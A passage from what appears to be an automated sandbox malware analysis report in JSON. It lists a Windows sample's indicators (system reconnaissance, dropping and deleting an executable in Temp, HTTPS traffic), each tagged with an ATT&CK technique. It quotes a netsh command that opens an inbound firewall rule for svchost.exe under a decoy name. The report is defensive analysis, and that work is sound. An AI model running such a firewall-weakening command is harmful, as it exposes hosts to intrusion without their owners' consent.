\"egzkrznd.exe\" queries volume information of \"C:\\\" at 00000000-00001396-0000010C-1736170\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-41525\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-811946\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-1143223\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-1144635", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cfc7643791575ffffffff0c0000004c62fc761f791575ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088ea2875ecf91200b344166b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b400071c000acbcf51200616b400088000000f822410081a82875ecf9120000009001009eee00000200000800000034315d00 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3e768823310000f0fd7f9a5cfe7600d0fd7fb0c95e0144f0fd7f00000000400000003f0000002500000000f0fd7fa4c95e01c15cfe76608205772500000000f0fd7f9a5cfe7600d0fd7fc8c95e015789fd768083057713171675d8eb3e76 (UID: 00000000-00005872)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000088773d00d4fa6400145cfd76435cfd76a0fb64000100000094013b000100000054fa6400935cfe7640830577d4a0fd76e3c56e77a0fb6400010000000100000000e03d000000000024fa640054fa6400c0fa640095e1f9764f3bf701feffffffd4a0fd761bbe15750000c57600000000 (UID: 00000000-00006044)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b07b63003cfc3400145cfd76435cfd7608fd3400010000009401610001000000bcfb3400935cfe7640830577d4a0fd7671bd3e7708fd34000100000001000000e0bf6300000000008cfb3400bcfb340028fc340095e1f9763542f701feffffffd4a0fd761bbe15750000c57600000000 (UID: 00000000-00004236)\n \"egzkrznd.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cfc7643791575ffffffff0c0000004c62fc761f791575ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00001396)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003360)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" queries volume information of \"C:\\\" at 00000000-00005872-0000010C-1312675\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" queries volume information of \"C:\\\" at 00000000-00005872-0000010C-1314068\n \"egzkrznd.exe\" queries volume information of \"C:\\\" at 00000000-00001396-0000010C-1734812\n \"egzkrznd.exe\" queries volume information of \"C:\\\" at 00000000-00001396-0000010C-1736170\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-41525\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-811946\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-1143223\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003900-0000010C-1144635", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6000fce2120080f44076000060000000000089f440763da00aac0200000070e312006ce3120064e2120068e2120018e4120095e1f976b10ef701c0e21200c83a4a7634e31200d58c427670e3120004e3120042a44076a8024a7644e31200d2f44076080000006ef5407644f5407685a10aac0200000070aa376f0000130026bb376f18e31200020000000000130070aa376f48e3120042a44076a8024a768ce3120010a9376f08000000e6a8376f94fcfbac0200000070aa376f0000130026bb376fac0e6000780e600058e312008050436f18e41200f9f23b6ff0b7dec3 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000b221fd160300000044e55e0191d14cad741700008ce55e01c0e45e01590000000300000048e45e0150e45e0118e65e01d0bb176ba5a50bc7feffffff98e55e01bfe5166bb221fd1698e55e01cce5166b0600000000001c6a01000000dfe5166b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e55e01000000008e00000044e65e01feffffffcce55e01cf00fe76d600fe766df754768e0000004700000044e65e0100000000a0e55e010000000008e65e01 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360002ae51b244de5e016d821277ec50310004010000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330066003800630038003000330035003800300038006600610037006200660066006300320030003400370038006500660062003000360038006200300032006300630031006600370064003200370062006200330034003700340030006500340038002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bfd7651da5476d8eb3e76ac0129000000290000000000000000000400e800c9000000000000000000000000000000000000000500e300c900000000000000000000000870290000000000200000000000000000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002900009a3300000000003e00003e340000c0289c3300a0af3300484c3100f00100000000290004000000009a3300acee5e010464fd7638012900e063fd760dfc54760000000000002900089a33006dd12875cd4f4dad6caed8760000000000000000f0010000a0af3300d82f29000100000000002900500129000c000000089a3300d82f290002000002180000000922002b820000000000000000000000030000004cee5e01820000007f070000000000000922002b02000000c0753075a0af330000000000c075307568ee5e01e830290000000000d82f2900c0ee5e01ff2bfd76 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000008b3c8f830300000044e55e0191d14cadd81400008ce55e01c0e45e015b0000000300000048e45e0150e45e0118e65e01d0bb176ba5a50bc7feffffff98e55e01bfe5166b8b3c8f8398e55e01cce5166b8205000000001c6a01000000dfe5166b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002900a09433000000000068000068340000c0c896330028b13300000c3000400300000000290000100000a0943300acee5e010464fd7638012900e063fd760dfc54760000000000002900a89433006dd12875cd4f4dad6caed8760000000000000000e000000028b13300d82f29000100000000002900500129000c000000a8943300d82f29000200000218000000bf0200bdac0000000000000000000000030000004cee5e01ac0000003f02000000000000952f00ba2c000000c07530754053340000000000c075307568ee5e014030290000000000d82f2900c0ee5e01ff2bfd76 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000061b82e7f0300000044e55e0191d14cad701000008ce55e01c0e45e015b0000000300000048e45e0150e45e0118e65e01d0bb176ba5a50bc7feffffff98e55e01bfe5166b61b82e7f98e55e01cce5166b8205000000001c6a01000000dfe5166b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"IsWow64Process\" with parameter \"5872\" - (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"egzkrznd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003360)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003360)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005872)\n \"cmd.exe\" called \"FindNextFileW\" with parameter egzkrznd.exe (UID: 00000000-00004000)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000006e2e936946c100000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000342eee671034ee670000000000000000\" - (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"egzkrznd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"egzkrznd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"211c80\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"785216\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003360)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003360)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"egzkrznd.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\ZVDNUOQU\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\egzkrznd.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\egzkrznd.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has section name .text with entropy \"6.630102803682182\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has section name .text with entropy \"7.972855291312212\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has section name .reloc with entropy \"6.221514100411251\"\n \"egzkrznd.exe\" has section name .text with entropy \"6.630102803682182\"\n \"egzkrznd.exe\" has section name .text with entropy \"7.972855291312212\"\n \"egzkrznd.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-189", "type": 6, "relevance": 2, "name": "Calls an API typically used to find a SID for the specified name", "description": "\"egzkrznd.exe\" called \"LookupAccountNameW\" with parameters {\"AccountName\": \"SYSTEM\"\n \"Sid\": \"1242516\"\n \"cbSid\": \"7c000000\"\n \"ReferencedDomainName\": \"NT AUTHORITY\"\n \"cchReferencedDomainName\": \"0c000000\"\n \"peUse\": \"05000000\"}\n \"svchost.exe\" called \"LookupAccountNameA\" with parameters {\"AccountName\": \"SYSTEM\"\n \"Sid\": \"1307480\"\n \"cbSid\": \"44000000\"\n \"ReferencedDomainName\": \"NT AUTHORITY\"\n \"cchReferencedDomainName\": \"0c000000\"\n \"peUse\": \"05000000\"}\n \"svchost.exe\" called \"LookupAccountNameA\" with parameters {\"AccountName\": \"SYSTEM\"\n \"Sid\": \"1307428\"\n \"cbSid\": \"44000000\"\n \"ReferencedDomainName\": \"NT 